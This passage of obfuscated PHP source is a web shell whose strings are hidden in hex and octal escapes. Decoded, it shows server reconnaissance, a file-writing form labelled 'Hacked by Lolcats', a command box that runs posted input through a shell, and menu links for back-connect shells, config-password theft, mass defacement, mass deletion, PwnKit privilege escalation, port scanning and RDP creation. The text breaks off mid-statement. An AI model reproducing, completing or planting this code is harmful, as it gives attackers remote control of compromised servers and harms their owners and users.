"\xa\x9\x9\x3c\144\151\x76\x20\x63\x6c\141\163\163\x3d\x27\x6d\x62\55\x33\47\76\12\x9\x9\11\74\x66\157\162\155\x20\155\145\164\150\157\x64\75\x27\x50\117\123\x54\47\x3e\xa\x9\11\11\x9\x3c\x69\x20\143\x6c\141\163\163\75\x27\x62\x69\x20\142\x69\55\146\151\154\145\x2d\x65\141\x72\x6d\x61\162\153\x27\76\x3c\x2f\151\76\40\x46\x69\x6c\x65\156\x61\x6d\x65\x3a\12\11\x9\11\x9\x3c\x69\x6e\x70\165\164\40\x63\x6c\x61\x73\163\75\x27\146\157\x72\x6d\x2d\x63\x6f\156\164\x72\157\x6c\x20\146\x6f\162\x6d\55\x63\x6f\x6e\164\x72\x6f\154\55\x73\x6d\40\164\x65\170\164\55\x64\141\162\153\47\x20\164\x79\x70\x65\75\47\x74\145\x78\164\47\40\x6e\x61\x6d\x65\x3d\47\x6e\141\155\x65\x5f\x66\151\154\x65\133\135\47\40\x70\154\141\143\145\x68\157\154\144\145\162\x3d\x27\154\x6f\154\143\x61\x74\163\x2e\164\x78\164\x27\40{$_r}\76\12\x9\11\x9\11\74\151\x20\x63\x6c\x61\x73\163\75\x27\x62\x69\40\x62\151\x2d\x63\x6f\144\145\x2d\x73\161\165\141\x72\145\x27\76\74\57\151\x3e\40\131\157\x75\x72\x20\123\x63\162\x69\x70\x74\72\xa\x9\11\x9\11\x3c\164\x65\x78\164\141\162\145\141\x20\x63\154\x61\163\x73\x3d\47\x66\x6f\162\x6d\55\x63\x6f\156\164\162\x6f\x6c\x20\x66\157\162\x6d\55\x63\157\156\164\162\157\x6c\x2d\163\x6d\40\164\x65\170\x74\x2d\x64\141\162\153\47\x20\156\141\x6d\145\x3d\x27\x63\x6f\156\164\x65\x6e\164\163\x5f\x66\x69\154\x65\x27\40\x72\157\167\x73\75\47\67\x27\x20\x70\154\x61\x63\x65\150\x6f\154\144\145\162\75\47\110\141\143\x6b\145\x64\x20\142\171\40\114\157\x6c\143\141\164\163\47\40{$_r}\76\x3c\x2f\x74\145\x78\x74\141\x72\x65\x61\x3e\12\x9\x9\x9\11\74\x64\151\166\x20\143\154\x61\163\163\x3d\47\x64\x2d\147\x72\x69\144\x20\x67\141\160\55\x32\47\x3e\x3c\142\x72\76\12\11\11\x9\x9\11\74\151\156\160\x75\164\40\x63\154\141\163\x73\x3d\47\142\x74\x6e\x20\142\x74\156\x2d\157\165\164\154\151\x6e\x65\x2d\154\151\x67\x68\164\x20\x62\164\x6e\55\x73\155\47\x20\x74\x79\160\x65\x3d\47\x73\x75\x62\155\151\x74\47\40\156\x61\155\145\x3d\47\142\151\153\x69\x6e\x27\40\x76\141\x6c\165\145\75\47\x53\x75\142\155\151\x74\x21\x27\76\12\x9\x9\11\x9\x3c\57\x64\151\x76\x3e\xa\x9\11\x9\x3c\57\x66\157\162\x6d\x3e\12\11\11\x3c\57\144\151\166\76"; } goto HWVuk; S3aat: $py = exe("\x70\171\164\x68\157\156\x20\x2d\x2d\x68\145\154\x70") ? "\x3c\x67\x72\x3e\x4f\116\x3c\57\x67\x72\x3e" : "\x3c\162\x64\x3e\x4f\106\106\x3c\x2f\162\144\76"; goto lI5Xj; x7c3H: @ini_set("\144\x69\163\160\x6c\141\x79\x5f\145\x72\x72\157\162\163", 0); goto sS0QO; n2Jfp: function p($file) { $p = fileperms($file); if (($p & 49152) == 49152) { $i = "\x73"; } elseif (($p & 40960) == 40960) { $i = "\x6c"; } elseif (($p & 32768) == 32768) { $i = "\55"; } elseif (($p & 24576) == 24576) { $i = "\142"; } elseif (($p & 16384) == 16384) { $i = "\x64"; } elseif (($p & 8192) == 8192) { $i = "\143"; } elseif (($p & 4096) == 4096) { $i = "\160"; } else { $i = "\x75"; } $i .= $p & 256 ? "\162" : "\x2d"; $i .= $p & 128 ? "\167" : "\x2d"; $i .= $p & 64 ? $p & 2048 ? "\x73" : "\170" : ($p & 2048 ? "\x53" : "\55"); $i .= $p & 32 ? "\x72" : "\55"; $i .= $p & 16 ? "\167" : "\55"; $i .= $p & 8 ? $p & 1024 ? "\163" : "\170" : ($p & 1024 ? "\x53" : "\55"); $i .= $p & 4 ? "\x72" : "\55"; $i .= $p & 2 ? "\x77" : "\55"; $i .= $p & 1 ? $p & 512 ? "\164" : "\170" : ($p & 512 ? "\x54" : "\x2d"); return $i; } goto HBdOH; uWBu2: $scdir = explode("\57", $dir); goto R4x76; pJlC5: if (!function_exists("\x70\157\163\151\x78\137\x67\x65\x74\145\147\151\144")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "\x3f"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["\156\x61\155\145"]; $uid = $uid["\x75\151\144"]; $group = $gid["\x6e\141\155\x65"]; $gid = $gid["\x67\x69\x64"]; } goto EfyhR; B7bX7: $gcw = "\x67\145\x74\143\167\144"; goto e7iUg; mThJN: echo "\x3c\x64\151\x76\x20\143\x6c\x61\x73\163\x3d\x27\x63\x6f\156\x74\x61\151\x6e\145\x72\55\146\154\165\x69\144\47\x3e\xa\40\40\40\x20\x3c\x64\x69\x76\40\x63\x6c\141\163\x73\x3d\x27\143\x6f\x72\156\x65\x72\47\x3e\12\x20\x20\40\40\x20\x20\x20\40\x3c\151\40\144\x61\x74\141\x2d\x62\x73\x2d\x74\157\x67\x67\x6c\145\x3d\47\143\x6f\x6c\x6c\x61\160\163\145\x27\40\x64\x61\x74\x61\55\x62\x73\x2d\x74\141\x72\x67\145\164\75\x27\43\x63\x6f\154\x6c\x61\160\163\x65\x45\170\x61\x6d\x70\154\145\x27\40\141\x72\x69\x61\55\145\x78\x70\141\x6e\144\x65\144\x3d\x27\x66\x61\x6c\163\145\47\40\x61\162\x69\141\x2d\143\x6f\156\x74\162\157\154\163\x3d\47\x63\x6f\x6c\x6c\141\160\163\145\105\x78\141\155\160\x6c\145\47\x3e\111\156\x66\x6f\x72\155\x61\x74\151\x6f\x6e\x20\x53\x65\162\x76\x65\x72\74\57\151\76\xa\40\x20\x20\40\74\x2f\144\x69\166\x3e\x3c\x62\162\x3e\12\x20\40\40\x20\x3c\x64\151\166\40\143\154\141\163\163\x3d\x27\143\157\154\154\x61\x70\163\x65\40\x74\145\170\x74\x2d\x64\x61\162\153\x20\155\142\55\63\47\x20\151\144\75\x27\143\x6f\x6c\x6c\x61\160\x73\145\105\x78\141\155\x70\x6c\145\47\x3e\xa\40\x20\x20\40\40\x20\x20\x20\74\x64\x69\x76\x20\143\154\141\x73\x73\75\47\x62\x6f\170\x20\x73\x68\141\x64\157\167\x20\142\x67\x2d\154\x69\x67\x68\164\x20\x70\x2d\63\40\x72\157\165\x6e\144\145\x64\x2d\x33\x27\x3e\x53\171\163\x74\x65\x6d\x3a\x20" . php_uname() . "\x3c\142\x72\76\12\40\x20\40\40\40\40\x20\40\x53\157\146\164\x77\141\162\145\72\40" . $_SERVER["\x53\x45\x52\x56\x45\x52\137\x53\117\106\124\x57\x41\122\105"] . "\x3c\x62\162\x3e\12\x20\40\x20\x20\40\x20\40\40\x50\x48\x50\x20\126\x65\162\x73\x69\x6f\x6e\72\40" . PHP_VERSION . "\40\120\x48\120\40\117\x73\x3a\40" . PHP_OS . "\x3c\142\x72\76\12\x20\x20\40\40\40\40\x20\x20\x53\145\x72\x76\x65\162\x20\x49\120\72\40" . gethostbyname($_SERVER["\110\124\x54\120\137\110\x4f\x53\124"]) . "\74\142\x72\76\xa\x20\x20\x20\40\x20\40\x20\x20\x59\x6f\x75\x72\40\111\x50\x3a\x20" . ia() . "\74\x62\162\x3e\12\40\40\x20\x20\x20\x20\40\x20\125\x73\x65\x72\x3a\40{$user}\40\x5b{$uid}\135\40\x7c\x20\107\162\157\165\x70\x3a\x20\x5b{$group}\x5d\40\133{$gid}\x5d\x3c\x62\162\76\12\40\40\40\40\x20\x20\x20\40\123\x61\x66\145\x20\115\x6f\x64\x65\72\40{$sm}\74\x62\x72\76\12\x20\x20\x20\x20\40\x20\x20\x20\x4d\131\123\121\114\x3a\40{$sql}\x20\x7c\40\120\105\x52\114\72\x20{$pl}\x20\174\40\120\x59\124\110\117\116\x3a\x20{$py}\40\174\x20\127\107\105\x54\x3a\40{$wget}\x20\x7c\x20\x43\125\122\114\72\x20{$curl}\x20\174\x20\107\x43\103\x3a\x20{$gcc}\x20\x7c\x20\x50\113\105\130\105\103\x3a\x20{$pkexec}\x3c\142\x72\x3e\xa\40\x20\40\40\x20\x20\40\40\x44\151\x73\141\x62\x6c\145\40\106\165\x6e\x63\x74\x69\x6f\x6e\x3a\74\x62\162\76\74\160\x72\x65\x3e{$disfc}\x3c\57\160\162\145\x3e\12\x20\40\x20\40\40\40\x20\x20\x3c\x2f\x64\151\x76\x3e\xa\x20\40\40\40\74\x2f\x64\151\166\76\12\x9\x9\x3c\57\x64\x69\166\x3e\12\x9\11\74\x64\151\x76\40\143\x6c\141\x73\163\75\47\164\145\170\x74\x2d\x63\145\156\x74\x65\162\47\x3e\12\x9\x9\11\x3c\144\x69\166\x20\x63\154\x61\163\163\x3d\x27\142\x74\156\x2d\147\162\x6f\165\x70\47\x3e\xa\40\x20\x20\40\40\40\40\x20\x20\40\40\40\x20\40\40\40\74\141\40\x63\x6c\141\x73\x73\75\47\142\164\156\x20\142\164\156\55\157\165\164\154\151\x6e\x65\55\x6c\x69\x67\x68\164\x20\x62\164\156\55\x73\x6d\47\x20\x68\x72\x65\146\75\47\77\144\x69\162\x3d{$path}\46\x69\144\x3d\x62\141\x63\153\x63\x6f\156\47\x3e\x3c\x69\x20\x63\154\141\163\163\75\x27\x62\x69\40\142\x69\x2d\150\144\x64\x2d\156\x65\x74\167\x6f\162\153\47\x3e\x3c\57\x69\x3e\x20\x42\141\143\153\40\103\x6f\156\x6e\145\x63\x74\x20\x3c\57\141\x3e\xa\11\x9\11\x9\x3c\141\40\143\154\x61\x73\x73\75\47\142\x74\156\x20\x62\x74\x6e\55\x6f\165\164\154\x69\156\145\55\x6c\151\x67\x68\x74\x20\x62\164\156\55\163\155\47\40\150\162\x65\146\x3d\47\x3f\x64\151\162\75{$path}\x26\151\x64\x3d\x63\155\x64\x27\76\74\x69\40\143\x6c\141\163\163\75\47\x62\x69\x20\142\x69\55\164\x65\x72\x6d\151\x6e\x61\x6c\x27\76\74\x2f\x69\x3e\40\103\157\155\x6d\x61\156\x64\40\74\x2f\x61\x3e\12\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\40\74\141\40\143\x6c\x61\163\163\x3d\47\x62\164\156\x20\142\164\156\x2d\x6f\x75\164\154\x69\156\145\55\154\151\x67\x68\164\40\142\164\156\x2d\x73\155\47\x20\x68\162\x65\146\75\47\x3f\x64\151\162\x3d{$path}\46\x69\144\x3d\x63\x6f\x6e\146\47\76\x3c\151\x20\x63\154\x61\x73\x73\x3d\x27\142\151\40\x62\x69\x2d\150\x64\x64\x27\76\x3c\x2f\x69\x3e\40\x43\x6f\x6e\146\151\x67\x20\x50\x61\163\x73\167\x6f\x72\x64\40\x3c\x2f\141\x3e\xa\x20\x20\40\40\40\x20\40\40\40\x20\x20\x20\x20\40\40\x20\74\141\x20\143\154\141\163\x73\x3d\x27\x62\164\x6e\x20\142\x74\156\55\x6f\165\x74\154\x69\156\x65\55\x6c\x69\147\150\164\40\142\164\x6e\x2d\163\x6d\47\x20\x68\162\x65\146\75\x27\77\144\x69\162\x3d{$path}\x26\151\144\75\x6d\x61\163\x73\143\150\x65\155\x6f\x64\47\x3e\x3c\x69\40\143\154\x61\x73\x73\x3d\x27\x62\x69\x20\142\151\55\146\x69\154\145\x2d\145\x61\x72\x6d\x61\x72\x6b\x2d\x6d\x65\144\151\143\x61\x6c\47\76\x3c\x2f\151\x3e\x20\103\150\155\x6f\144\40\101\154\154\40\x5b\x46\x2f\104\135\40\74\57\x61\x3e\12\11\11\11\x9\x3c\x61\40\143\x6c\x61\163\163\75\47\142\164\x6e\40\x62\x74\x6e\x2d\x6f\x75\x74\x6c\151\156\145\x2d\x6c\151\147\150\x74\x20\142\x74\x6e\x2d\x73\x6d\47\x20\x68\162\x65\x66\75\47\x3f\144\x69\162\75{$path}\x26\151\x64\x3d\162\x64\160\47\x3e\74\x69\40\143\x6c\141\x73\163\75\x27\142\151\x20\x62\151\55\151\x6e\164\145\x72\163\145\x63\x74\47\76\74\57\151\76\x20\x43\x72\145\141\164\145\x20\122\104\120\40\74\57\141\x3e\xa\40\x20\40\x20\40\40\x20\x20\x20\40\40\40\40\40\40\40\74\x61\40\x63\x6c\141\x73\163\x3d\47\x62\164\156\40\x62\x74\156\x2d\157\x75\x74\154\x69\x6e\x65\x2d\x6c\151\147\150\164\x20\142\x74\156\x2d\163\155\x27\x20\150\162\145\146\x3d\x27\77\x64\x69\162\75{$path}\46\x69\x64\75\x63\x70\x61\156\145\x6c\x27\76\74\151\x20\x63\154\141\x73\163\x3d\x27\x62\x69\40\142\x69\x2d\x67\x65\x61\x72\x27\76\x3c\x2f\151\76\x20\143\x50\141\x6e\145\154\40\124\x6f\x6f\154\163\x3c\57\x61\76\12\40\x20\40\x20\40\40\40\x20\x20\x20\x20\x20\40\40\40\x20\74\141\x20\143\x6c\141\x73\163\x3d\x27\x62\x74\x6e\40\x62\164\156\55\x6f\165\164\x6c\151\x6e\x65\x2d\x6c\x69\x67\150\x74\40\x62\164\x6e\x2d\163\x6d\x27\x20\x68\162\x65\x66\75\x27\x3f\144\151\x72\75{$path}\46\151\144\75\146\151\x6e\144\155\164\x69\155\145\47\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\75\47\x62\151\x20\x62\151\55\146\x69\x6c\x65\x73\x27\x3e\x3c\57\151\76\40\x46\x69\x6e\144\40\115\157\144\151\146\151\x65\x64\x20\x54\151\155\145\40\74\x2f\141\76\xa\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\40\40\74\141\40\x63\x6c\141\x73\x73\x3d\x27\x62\x74\x6e\40\142\164\x6e\55\157\165\164\x6c\151\x6e\x65\55\x6c\151\147\x68\164\x20\142\164\156\x2d\163\x6d\x27\40\150\162\x65\x66\75\x27\77\144\151\x72\75{$path}\x26\151\x64\x3d\x66\151\156\x64\x6b\x65\x79\x27\x3e\74\151\40\x63\154\141\x73\163\75\47\142\151\40\142\151\x2d\x66\x69\154\x65\55\145\141\x72\x6d\x61\162\x6b\x2d\x62\162\145\141\x6b\47\76\x3c\x2f\151\76\x20\106\151\x6e\x64\x20\x46\151\x6c\145\40\74\x2f\141\76\xa\x20\40\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\x3c\x61\40\143\x6c\x61\x73\x73\x3d\x27\x62\164\x6e\40\142\x74\x6e\x2d\x6f\x75\x74\x6c\151\156\145\x2d\x6c\x69\x67\150\164\40\142\164\156\x2d\163\x6d\x27\x20\x68\162\x65\x66\x3d\x27\77\x64\151\162\x3d{$path}\x26\151\144\x3d\x67\145\x74\160\x72\x69\166\47\76\x3c\x69\x20\143\x6c\141\x73\x73\x3d\47\x62\x69\x20\142\x69\x2d\x63\x6f\x64\145\x2d\163\x71\165\141\x72\x65\47\76\74\x2f\x69\x3e\x20\x47\x65\164\x20\x50\162\151\x76\x61\164\145\x20\124\157\x6f\154\x73\40\x3c\x2f\141\76\12\40\x20\40\x20\40\40\40\40\40\x20\40\40\x20\x20\40\x20\74\x61\x20\143\154\141\163\163\75\x27\142\164\156\x20\142\164\x6e\x2d\x6f\165\164\154\151\x6e\145\55\154\x69\x67\x68\164\x20\x62\x74\156\55\163\155\47\x20\150\162\x65\x66\x3d\x27\77\x64\x69\x72\x3d{$path}\x26\151\x64\75\x6a\165\155\160\151\156\147\47\x3e\x3c\151\40\x63\x6c\x61\163\x73\75\47\142\151\x20\x62\151\55\144\x6f\157\162\x2d\x6f\160\x65\156\x27\x3e\x3c\x2f\151\x3e\40\x4a\165\x6d\160\151\156\x67\x20\74\x2f\x61\76\12\x9\11\11\x9\x3c\x61\40\143\154\141\x73\163\75\47\142\x74\x6e\40\142\x74\x6e\x2d\157\x75\164\x6c\151\156\145\55\x6c\x69\147\x68\164\x20\x62\164\x6e\55\x73\x6d\x27\x20\x68\x72\x65\x66\x3d\x27\x3f\144\151\162\x3d{$path}\x26\151\x64\x3d\x6c\157\143\153\x66\151\154\x65\47\76\x3c\151\x20\x63\154\x61\x73\x73\x3d\47\x62\151\x20\x62\x69\55\x66\151\x6c\x65\x2d\145\x61\x72\x6d\141\x72\153\x2d\x6c\x6f\x63\153\47\x3e\x3c\x2f\151\76\40\x4c\x6f\143\153\x20\x46\x69\x6c\x65\x20\x3c\57\141\76\12\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\x3c\x21\x2d\55\x3c\141\x20\x63\x6c\x61\163\x73\75\47\142\x74\x6e\40\142\164\156\55\x6f\165\164\x6c\x69\156\145\55\x6c\x69\147\150\164\40\142\x74\156\55\x73\x6d\47\x20\150\162\x65\146\x3d\47\x3f\144\x69\x72\75{$path}\46\x69\144\75\x6c\157\x6b\x69\164\47\x3e\x3c\151\x20\143\154\x61\163\163\x3d\47\142\151\40\142\151\x2d\154\x6f\143\x6b\47\76\74\x2f\x69\76\x20\114\x6f\x63\x6b\x20\123\150\x65\x6c\154\40\x3c\57\141\76\x2d\x2d\76\12\11\11\11\11\74\x61\40\143\154\141\x73\x73\x3d\47\x62\164\x6e\x20\x62\x74\x6e\x2d\157\165\x74\154\x69\156\145\55\x6c\151\147\x68\x74\40\142\x74\x6e\55\163\155\47\x20\150\162\145\146\x3d\47\x3f\144\x69\162\x3d{$path}\46\x69\144\x3d\144\145\x66\141\143\x65\x27\76\74\x69\x20\143\154\141\163\x73\x3d\x27\142\151\x20\142\151\x2d\x65\x78\143\154\x61\x6d\x61\164\151\x6f\156\x2d\x64\x69\141\155\157\x6e\144\47\76\x3c\57\x69\x3e\40\x4d\x61\163\x73\x20\x44\145\146\141\143\145\74\57\141\76\xa\x9\11\11\x9\x3c\x61\40\143\x6c\141\163\x73\x3d\x27\x62\164\156\40\x62\164\156\x2d\157\x75\x74\154\x69\x6e\x65\x2d\144\141\x6e\x67\x65\162\40\x62\x74\156\x2d\x73\x6d\47\x20\150\162\145\146\x3d\47\x3f\x64\151\x72\75{$path}\x26\151\144\x3d\144\145\x6c\145\164\x65\x27\76\74\x69\40\x63\x6c\x61\x73\x73\x3d\x27\142\151\x20\x62\x69\x2d\x74\162\141\x73\150\x27\x3e\x3c\57\x69\76\40\x4d\141\x73\163\40\104\145\154\x65\x74\x65\x20\74\57\x61\76\xa\40\x20\x20\40\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\x3c\x61\x20\143\x6c\x61\x73\163\75\47\x62\164\156\x20\142\x74\156\x2d\x6f\165\164\154\x69\156\145\x2d\154\x69\x67\150\164\40\142\164\156\55\163\155\x27\x20\150\x72\x65\146\x3d\x27\x3f\144\151\162\x3d{$path}\46\151\144\x3d\x63\x68\155\157\144\x27\x3e\74\151\40\143\154\x61\x73\x73\75\x27\x62\x69\x20\142\x69\55\x66\151\x6c\x65\x2d\145\x61\162\155\141\x72\x6b\55\155\x65\144\151\143\141\x6c\x27\x3e\x3c\x2f\151\x3e\x20\115\141\x73\x73\40\x43\150\x6d\157\x64\74\57\141\x3e\xa\x20\40\40\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\40\74\x61\40\143\154\x61\x73\163\75\47\x62\x74\x6e\40\x62\x74\156\55\157\x75\x74\154\151\x6e\145\x2d\154\151\147\150\164\40\142\x74\x6e\x2d\x73\x6d\47\40\x68\x72\145\146\75\47\x3f\144\x69\x72\75{$path}\x26\151\x64\75\160\x77\156\153\151\x74\47\76\x3c\151\40\143\154\141\x73\163\75\x27\142\x69\x20\142\151\x2d\x62\x75\x67\47\76\74\57\x69\76\40\120\167\x6e\113\151\x74\x20\x3c\x2f\141\x3e\xa\x9\11\x9\11\x3c\x61\x20\143\154\141\x73\163\75\47\142\164\156\40\142\164\x6e\55\x6f\165\164\x6c\x69\156\x65\55\x6c\x69\x67\x68\x74\x20\x62\x74\x6e\55\x73\x6d\47\x20\x68\x72\145\x66\75\47\x3f\144\151\162\75{$path}\x26\x69\144\x3d\160\157\x72\x74\x73\143\141\x6e\47\76\74\151\x20\x63\x6c\141\x73\x73\x3d\x27\x62\x69\40\142\151\x2d\x68\144\x64\x27\76\74\57\x69\x3e\x20\120\157\162\x74\40\123\143\141\x6e\40\x3c\57\x61\76\12\x9\x9\x9\x9\x3c\x61\40\143\x6c\141\x73\x73\x3d\x27\142\x74\156\40\142\164\x6e\x2d\x6f\165\x74\x6c\x69\156\x65\x2d\154\151\147\150\164\40\142\164\156\x2d\163\x6d\47\x20\150\162\x65\x66\x3d\x27\77\144\x69\162\75{$path}\x26\151\x64\75\x75\160\x6c\x6f\141\144\x27\76\x3c\x69\x20\143\x6c\141\x73\163\x3d\47\142\151\x20\x62\151\55\x75\160\x6c\157\x61\x64\x27\x3e\x3c\57\x69\76\40\125\160\x6c\x6f\x61\x64\x20\x3c\57\x61\x3e\12\x20\40\40\x20\x20\40\40\x20\40\x20\40\40\40\x20\x20\x20\x3c\141\40\x63\x6c\141\163\x73\75\47\x62\164\x6e\40\142\x74\156\x2d\157\x75\164\154\x69\x6e\x65\55\154\x69\147\150\x74\40\x62\164\x6e\55\x73\x6d\x27\x20\150\162\145\x66\75\x27\77\x64\x69\x72\75{$path}\46\x69\x64\75\x7a\x6f\x6e\145\x68\x27\x3e\x3c\x69\40\x63\x6c\x61\163\163\x3d\x27\x62\x69\x20\x62\x69\55\146\151\154\x65\x2d\164\x65\170\x74\x27\76\x3c\x2f\151\x3e\x20\132\157\156\145\x2d\x48\x20\74\57\x61\x3e\x3c\142\x72\76\40\xa\11\x9\11\74\x2f\144\x69\166\x3e\xa\x9\11\74\57\x64\x69\166\76"; goto m1iO2; x5qzN: if ($_1337["\x61\x63\164\x69\x6f\x6e"] == "\166\151\145\167") { s(); echo "\74\x64\x69\x76\x20\x63\154\x61\163\x73\x3d\x27\142\164\x6e\x2d\x67\x72\157\165\160\x27\76\12\x3c\141\x20\143\154\141\163\x73\75\x27\x62\x74\x6e\40\142\x74\156\x2d\157\x75\164\154\151\156\x65\55\x6c\x69\x67\150\x74\x20\x62\164\x6e\55\163\155\x27\40\150\x72\x65\x66\x3d\x27\77\x64\x69\162\x3d{$path}\x26\x61\143\x74\x69\x6f\156\x3d\x76\x69\x65\x77\x26\x6f\160\x6e\x3d{$file}\x27\76\x3c\151\40\143\x6c\x61\x73\163\x3d\x27\x62\x69\40\142\x69\55\145\171\145\47\76\x3c\57\151\x3e\74\57\x61\76\12\74\141\x20\x63\x6c\x61\x73\x73\75\47\142\164\156\40\142\164\x6e\55\157\165\164\154\151\x6e\145\55\x6c\x69\x67\x68\164\40\x62\x74\156\x2d\x73\155\x27\40\x68\162\145\146\x3d\47\77\144\151\162\75{$path}\x26\x61\x63\x74\151\157\156\75\145\x64\151\164\46\157\x70\x6e\x3d{$file}\47\x3e\x3c\x69\x20\x63\154\141\x73\163\75\x27\142\151\40\x62\x69\55\160\x65\x6e\143\x69\x6c\x2d\x73\x71\x75\x61\162\x65\47\x3e\74\57\x69\76\74\x2f\x61\x3e\xa\74\141\40\x63\154\141\x73\163\75\47\x62\x74\x6e\x20\142\164\156\55\x6f\165\x74\154\151\x6e\x65\x2d\x6c\x69\147\x68\164\40\x62\x74\x6e\55\163\x6d\x27\x20\x68\162\145\x66\75\x27\x3f\144\151\x72\x3d{$path}\46\x61\143\x74\151\157\156\75\162\145\x6e\x61\x6d\x65\x26\x6f\160\156\x3d{$file}\47\76\x3c\x69\x20\x63\154\141\x73\163\75\47\142\151\40\x62\x69\x2d\x70\x65\156\143\x69\x6c\x2d\146\151\154\154\47\76\74\x2f\x69\x3e\x3c\57\x61\76\12\74\141\40\143\154\x61\163\163\75\x27\x62\x74\156\x20\142\164\156\55\x6f\x75\164\154\151\156\145\x2d\154\x69\147\x68\164\x20\142\164\x6e\55\x73\155\x27\x20\150\162\145\146\75\x27\77\x64\151\162\75{$path}\x26\141\x63\x74\x69\157\x6e\x3d\143\150\x61\156\x67\x65\x6d\157\x64\x69\146\151\x65\144\46\157\x70\x6e\x3d{$file}\47\76\74\x69\40\143\154\x61\163\163\75\x27\x62\151\x20\x62\151\x2d\143\x61\x6c\145\x6e\144\141\x72\55\144\141\x74\145\x27\76\74\x2f\x69\76\74\57\141\x3e\12\74\141\40\x63\154\x61\163\163\x3d\47\142\x74\156\x20\x62\164\156\x2d\x6f\x75\164\x6c\x69\x6e\145\x2d\x6c\151\x67\150\164\x20\142\x74\x6e\x2d\163\x6d\47\x20\150\x72\x65\146\x3d\x27\77\x64\x69\162\x3d{$path}\46\141\x63\164\151\157\x6e\x3d\143\150\145\x6d\157\144\46\157\x70\156\x3d{$file}\47\x3e\74\x69\x20\x63\154\141\163\163\x3d\47\x62\x69\x20\x62\151\55\146\151\154\145\55\145\141\x72\x6d\141\x72\153\x2d\155\145\x64\151\x63\141\x6c\47\76\x3c\x2f\151\x3e\x3c\x2f\x61\x3e\12\x3c\141\40\143\x6c\141\x73\x73\x3d\x27\142\164\x6e\40\x62\164\156\x2d\157\x75\164\154\151\156\145\55\144\141\156\x67\x65\x72\40\x62\164\156\x2d\163\155\47\x20\150\162\145\146\x3d\x27\x3f\144\151\162\x3d{$path}\46\141\143\164\x69\x6f\156\x3d\144\145\154\x65\164\145\137\x66\x69\x6c\x65\46\157\160\156\75{$file}\x27\76\x3c\x69\x20\143\x6c\141\x73\x73\x3d\x27\x62\151\x20\x62\x69\x2d\x74\162\141\x73\x68\55\x66\x69\x6c\154\x27\76\x3c\57\x69\76\74\x2f\x61\76\12\x3c\x2f\144\151\x76\x3e\12\11\x9\x3c\x62\x72\x3e\74\x69\x20\143\x6c\x61\163\x73\x3d\x27\142\151\x20\142\x69\55\146\x69\x6c\x65\55\145\x61\162\155\x61\162\x6b\x27\x3e\x3c\x2f\151\x3e\72\x26\x6e\x62\163\x70\73" . basename($file) . "\12\11\11\74\x2f\x62\x72\x3e\12\11\11\74\144\151\x76\40\x63\154\141\x73\163\75\47\x62\147\x2d\x64\x61\162\x6b\x27\76\xa\x9\x9\x9\74\x64\x69\166\x20\143\x6c\141\x73\x73\x3d\x27\143\157\156\x74\x61\151\x6e\145\x72\x2d\x66\x6c\165\x69\144\x20\x6c\x61\156\x67\165\x61\147\145\x2d\x6a\x61\166\141\163\x63\162\151\x70\164\x27\76\xa\11\x9\x9\x9\74\x74\145\x78\164\141\162\x65\141\x20\x72\x6f\167\x73\x3d\x27\x31\60\47\40\143\x6c\141\x73\x73\75\47\146\x6f\x72\155\x2d\143\157\x6e\x74\162\x6f\x6c\47\40\144\x69\163\141\142\x6c\x65\144\x3d\x27\47\76" . htmlspecialchars(file_get_contents($file)) . "\74\57\x74\x65\x78\x74\x61\x72\x65\141\76\12\11\x9\x9\x3c\57\x64\x69\x76\x3e\12\x9\11\74\57\144\151\x76\x3e"; } goto S0ump; nShOo: if ($_1337["\x69\x64"] == "\143\x6d\x64") { s(); echo "\x3c\143\145\156\164\x65\x72\x20\143\154\141\163\x73\x3d\42\x61\x6e\x75\42\x3e\x43\x6f\155\x6d\141\156\144\40\x28\x55\x73\x65\x20\115\x61\x6e\171\x20\106\x75\156\x63\x74\x69\x6f\156\x73\41\51\74\57\x63\x65\156\x74\145\162\76"; if (!empty($_POST["\143\x6d\x64"])) { $cmd = exe($_POST["\x63\x6d\144"]); } echo "\x3c\x64\x69\166\40\x63\154\x61\163\x73\75\47\x6d\x62\x2d\63\47\x3e\12\x20\x20\40\40\40\40\x20\40\40\40\40\x20\74\x66\157\x72\155\x20\x6d\x65\x74\150\157\144\75\47\120\x4f\x53\124\x27\76\12\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\74\144\x69\166\x20\143\154\x61\x73\x73\75\47\151\156\160\165\164\55\147\162\157\x75\160\40\155\x62\55\x33\x27\x3e\12\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\40\40\40\x3c\x69\156\160\x75\x74\40\143\154\141\163\163\x3d\47\x66\157\x72\x6d\x2d\x63\x6f\156\164\162\x6f\154\x20\142\x74\156\55\x73\155\40\x74\x65\170\x74\x2d\144\x61\162\153\47\40\164\171\x70\145\75\47\164\145\x78\x74\47\40\156\141\x6d\x65\x3d\x27\x63\155\x64\x27\40\x76\x61\154\165\145\75\x27" . htmlspecialchars($_POST["\143\x6d\x64"], ENT_QUOTES, "\125\x54\x46\x2d\x38") . "\x27\x20\160\x6c\x61\143\145\150\x6f\x6c\x64\145\x72\75\x27\167\x68\x6f\x61\x6d\x69\47\40{$_r}\x3e\xa\40\x20\x20\40\40\40\x20\40\x20\40\40\40\x20\40\40\x20\40\40\40\x20\74\142\165\164\164\157\156\x20\143\154\x61\x73\x73\x3d\x27\142\x74\156\40\142\164\156\55\x6f\165\164\154\x69\156\145\55\x6c\x69\x67\x68\164\40\x62\x74\156\55\163\155\47\40\x74\x79\x70\145\x3d\x27\x73\165\142\155\151\x74\x27\x3e\74\151\x20\143\x6c\x61\x73\163\x3d\x27\142\x69\40\142\151\55\x65\x6d\x6f\152\151\55\x73\155\x69\154\145\55\x75\160\163\x69\x64\x65\55\144\x6f\x77\156\x27\76\74\x2f\151\76\74\x2f\142\x75\164\164\157\156\76\12\x20\x20\40\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\40\x3c\57\x64\151\x76\x3e\12\40\x20\40\x20\40\40\x20\x20\x20\40\40\x20\x3c\57\146\x6f\x72\155\76"; if (isset($cmd)) { echo 